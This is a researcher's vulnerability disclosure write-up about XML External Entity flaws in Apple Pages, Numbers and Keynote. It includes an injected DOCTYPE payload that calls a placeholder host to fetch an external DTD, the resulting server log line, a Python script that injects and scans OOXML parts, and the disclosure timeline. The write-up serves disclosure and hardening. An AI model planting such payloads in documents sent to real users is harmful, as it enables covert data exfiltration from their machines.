In June of 2015, Patrik Fehrenbach and I identified a series of vulnerabilities in a few of Apple's productivity applications: Pages, Numbers and Keynote, on OS X and on iOS 8.x (or older). In short, the applications failed to validate input while parsing a document: the XML parser resolved external entities declared in the document's DTD, which is a classic XML External Entity (XXE) weakness.
Looking at the three applications, they all have one thing in common: the documents they handle are zip packages made up of XML files once unpacked. Let's start with Apple Pages.
Archive:  xxe.docx
  inflating: [Content_Types].xml
   creating: _rels/
  inflating: _rels/.rels
   creating: docProps/
  inflating: docProps/app.xml
  inflating: docProps/core.xml
  inflating: docProps/thumbnail.jpeg
   creating: word/
   creating: word/_rels/
  inflating: word/_rels/document.xml.rels
  inflating: word/document.xml
  inflating: word/fontTable.xml
  inflating: word/settings.xml
  inflating: word/styles.xml
  inflating: word/stylesWithEffects.xml
   creating: word/theme/
  inflating: word/theme/theme1.xml
  inflating: word/webSettings.xml
Each XML file in the listing above plays a part in the makeup of the docx document, but the files that got our attention were:
docProps/app.xml
docProps/core.xml
word/document.xml
From my understanding, app.xml stores the application version used and company information, and core.xml contains metadata such as the user who created the file and the creation date and time. document.xml holds the content of the document itself. Inserting an XXE payload into any of those files (or all of them, just for fun) makes Apple Pages crash; the XML is nevertheless parsed, and the external entity reference is resolved before the application gives up on the file. For this example we'll use the following payload:
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE r [<!ELEMENT r ANY >
<!ENTITY % sp SYSTEM "http://IP:PORT/somefile.xml">
%sp;%param1;]>
Here IP:PORT is the host we control, and somefile.xml on that host is the external DTD that the parser fetches when it resolves %sp; (that DTD is also where the %param1; entity referenced right after it would be declared).
We then save the file and pack it again. If the repacked file is opened with MS Word, we are told that it is corrupted, and the same happens in Apple Pages, but in the background our server receives this request:
SomeIP - - [24/Jun/2015 03:09:41] "GET /somefile.xml HTTP/1.1" 200 -
So what exactly is happening? The parser handling the document resolves the external parameter entity declared in the DOCTYPE and requests its SYSTEM identifier from our server; that request is the GET above, and it is made before the application reports the file as corrupted.
This is also exploitable on iOS 8.x: send the file to an iPhone or iPad and let Pages process it.
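To make the unpack, inject, repack and observe steps concrete, here is an added example (not code from the original write-up, and not Apple's code): it builds a constructed, minimal OOXML-style package, injects the prolog above into the three parts named earlier, and then scans the package with Python's expat parser, whose external-entity hook records, instead of fetching, the URL that a resolving parser such as the one in Pages would request. The part contents, the http://IP:PORT placeholder and the has_doctype check are assumptions for the demo; the package is deliberately too minimal for Word or Pages to open.

```python
"""Added example: blind-XXE injection into OOXML parts and an offline
scan that records the URL a resolving parser would fetch (stdlib only)."""
import io
import zipfile
import xml.parsers.expat as expat

# Constructed stand-ins for the real parts (no relationships, so a real
# office application would not open this package). Only the parts the
# write-up singles out are targeted by inject().
SAMPLE_PARTS = {
    "[Content_Types].xml": b'<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        b'<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>',
    "docProps/app.xml": b'<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        b'<Properties><Application>SomeApp</Application></Properties>',
    "docProps/core.xml": b'<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        b'<coreProperties><creator>user</creator></coreProperties>',
    "word/document.xml": b'<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        b'<document><body><p>hello</p></body></document>',
}
TARGET_PARTS = ("docProps/app.xml", "docProps/core.xml", "word/document.xml")


def xxe_prolog(dtd_url):
    """The prolog from the write-up: an external parameter entity whose SYSTEM
    identifier points at the tester's server. %param1; is expected to be
    declared by the fetched DTD (somefile.xml in the write-up)."""
    return (b'<?xml version="1.0" encoding="UTF-8" standalone="yes"?>\n'
            b'<!DOCTYPE r [<!ELEMENT r ANY >\n'
            b'<!ENTITY % sp SYSTEM "' + dtd_url.encode() + b'">\n'
            b'%sp;%param1;]>\n')


def pack(parts):
    """Zip a dict of part name -> bytes into an OOXML-style package."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, data in parts.items():
            zf.writestr(name, data)
    return buf.getvalue()


def unpack(package):
    with zipfile.ZipFile(io.BytesIO(package)) as zf:
        return {name: zf.read(name) for name in zf.namelist()}


def inject(package, dtd_url, targets=TARGET_PARTS):
    """Return a new package in which the XXE prolog replaces the XML
    declaration of each target part (the unpack, edit, repack step)."""
    parts = unpack(package)
    for name in targets:
        body = parts[name]
        if body.startswith(b"<?xml"):
            body = body[body.index(b"?>") + 2:]  # drop the original declaration
        parts[name] = xxe_prolog(dtd_url) + body
    return pack(parts)


def scan_package(package):
    """Parse every XML part with expat. Parameter-entity parsing is forced on
    (standalone="yes" in the prolog would otherwise suppress it) and the
    external-entity hook logs the SYSTEM id instead of fetching it. Returns
    part name -> list of URLs a resolving parser would have requested."""
    findings = {}
    for name, data in unpack(package).items():
        if not name.endswith((".xml", ".rels")):
            continue
        requested = []

        def on_external_ref(context, base, system_id, public_id):
            requested.append(system_id)
            return 1  # report success to expat; nothing is actually fetched

        p = expat.ParserCreate()
        p.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_ALWAYS)
        p.ExternalEntityRefHandler = on_external_ref
        try:
            p.Parse(data, True)
        except expat.ExpatError:
            # Without the fetched DTD, %param1; is undefined and the parse
            # fails, much like the "corrupted file" the applications report.
            # The fetch attempt was already recorded before that point.
            pass
        if requested:
            findings[name] = requested
    return findings


def has_doctype(data):
    """Cheap hardening check: no legitimate OOXML part carries a DOCTYPE, so a
    consumer can refuse the part before any entity declaration is processed."""
    seen = []
    p = expat.ParserCreate()
    p.StartDoctypeDeclHandler = lambda name, sysid, pubid, internal: seen.append(name)
    try:
        p.Parse(data, True)
    except expat.ExpatError:
        pass
    return bool(seen)


if __name__ == "__main__":
    evil = inject(pack(SAMPLE_PARTS), "http://IP:PORT/somefile.xml")
    for part, urls in scan_package(evil).items():
        print(part, "would request", urls, "doctype:", has_doctype(unpack(evil)[part]))
```

The scan reports each injected part together with http://IP:PORT/somefile.xml, which is the GET the write-up saw on its server, while the untouched package yields nothing. For a consumer of these formats the safer posture is the has_doctype rule: reject any part that declares a DOCTYPE at all, rather than trying to decide which entity references are harmless.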
Now that we have successfully exploited this in Apple Pages, are the other two exploitable as well?
Numbers and Keynote
The same method demonstrated for Apple Pages applies to Apple Numbers and Keynote.
Injecting the same payload into the files mentioned above results in the same behavior, and it is likewise exploitable when the file is opened on an iPhone or iPad (iOS 8).
Disclosure timeline
7/23/2015 – Apple Pages vulnerability report sent
7/23/2015 – Automated reply from Apple
8/25/2015 – Requested an update – no answer
9/14/2015 – Requested another update
9/14/2015 – Apple acknowledged the vulnerability; patch to be released soon
9/15/2015 – Apple Keynote vulnerability report sent
9/16/2015 – Automated reply from Apple
9/17/2015 – Apple Numbers vulnerability report sent
9/18/2015 – Automated reply from Apple
9/25/2015 – Requested update – still working on it
10/4/2015 – Issue resolved by Apple
10/15/2015 – CVE assigned